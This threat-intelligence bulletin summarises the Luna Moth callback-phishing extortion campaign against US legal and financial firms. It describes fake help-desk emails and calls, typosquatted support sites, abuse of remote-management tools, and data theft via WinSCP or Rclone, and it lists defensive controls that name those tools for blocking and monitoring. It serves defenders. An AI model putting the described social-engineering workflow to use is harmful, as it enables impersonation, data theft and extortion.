Luna Moth Extortion Hackers Pose as IT Help Desks to Breach US Firms

Summary:
The Luna Moth threat group, also known as Silent Ransom Group, has significantly escalated its data-theft extortion campaigns, particularly targeting legal and financial institutions in the United States. First observed in 2022 following the dissolution of the Conti ransomware syndicate, Luna Moth evolved from BazarCall operators, threat actors previously responsible for delivering Ryuk and Conti ransomware via phone-based phishing. Unlike traditional ransomware campaigns, Luna Moth’s operations rely entirely on social engineering and deception, with no malware payloads or encryption observed in recent attacks.

In their latest campaigns, beginning around March 2025, Luna Moth sends carefully crafted phishing emails that impersonate IT helpdesk notifications from the victim’s organization. These emails instruct recipients to call a fake support number to resolve fabricated issues. Once a target calls the number, they are connected with a Luna Moth operator posing as an IT support technician. The operator then persuades the victim to visit a fake IT support website, domains registered to mimic legitimate firms using typosquatting techniques and install remote monitoring and management tools.

The attackers abuse legitimate, digitally signed RMM software, including Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop. These tools, commonly used in corporate environments, often bypass endpoint security controls due to their trusted status. Once installed, they provide the attacker with full keyboard access to the victim's device. The adversary uses this access to explore local files, network shares, and connected devices in search of sensitive corporate data.

Security Officer Comments:
After identifying and collecting valuable files, the attackers exfiltrate the data using secure file transfer tools like WinSCP over SFTP or cloud synchronization tools like Rclone. The stolen data is then used for extortion. Victims are contacted and threatened with public disclosure of the information via Luna Moth’s clearweb extortion site unless a ransom is paid. Reported ransom demands range from one to eight million USD, depending on the sensitivity and volume of the stolen data. EclecticIQ researchers have identified at least 37 domains associated with this campaign, many registered through GoDaddy and designed to spoof major U.S. law firms and financial organizations. The campaign’s stealth is notable. It avoids traditional indicators such as malware-laden attachments or exploitative links. Instead, the attacker manipulates the victim into initiating the compromise themselves, a technique that complicates detection and response.

Suggested Corrections:
Defending against Luna Moth requires a shift from malware-focused models to behavioral monitoring, user education, and tightened control over RMM tools. Recommended countermeasures include:
  • Restrict RMM Software
    • Block or restrict installations of Zoho Assist, AnyDesk and other RMM tools unless explicitly approved.
  • Monitor Endpoint Behavior
    • Track the use of RMM tools and file transfer utilities (e.g., WinSCP or Rclone) for suspicious parameters and execution patterns.
  • Detect Spoofed Domains
    • Deploy email rules to flag messages from impersonated helpdesk domains (e.g., [org]-helpdesk[.]com).
  • Educate Employees
    • Deliver regular training focused on detecting social engineering, spotting spoofed invoices, and verifying suspicious support requests.
  • Leverage Threat Intelligence
    • Block known Luna Moth infrastructure using threat intelligence—especially lure domains and exfiltration servers.
Link(s):
https://www.bleepingcomputer.com/ne...ers-pose-as-it-help-desks-to-breach-us-firms/